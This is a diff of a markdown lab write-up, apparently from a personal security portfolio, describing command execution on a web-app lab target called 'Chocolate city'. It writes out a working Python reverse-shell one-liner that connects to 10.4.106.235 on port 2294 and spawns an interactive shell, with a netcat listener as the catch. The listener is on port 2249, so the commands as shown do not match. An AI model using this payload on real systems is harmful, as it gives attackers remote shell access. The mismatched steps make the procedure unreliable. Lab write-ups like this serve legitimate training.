Tharisky/Portfolio/Web App/Labs/Chocolate city.md

-the website was querried to confirm if there is a python binary on it
+using the command " which python3 " on the page, the server hosting website was querried to confirm if there is a python binary on it , and the response showed that there is a python binary

-using the command
+then using the command
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.106.235",2294));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 and
 nc -nlvp 2249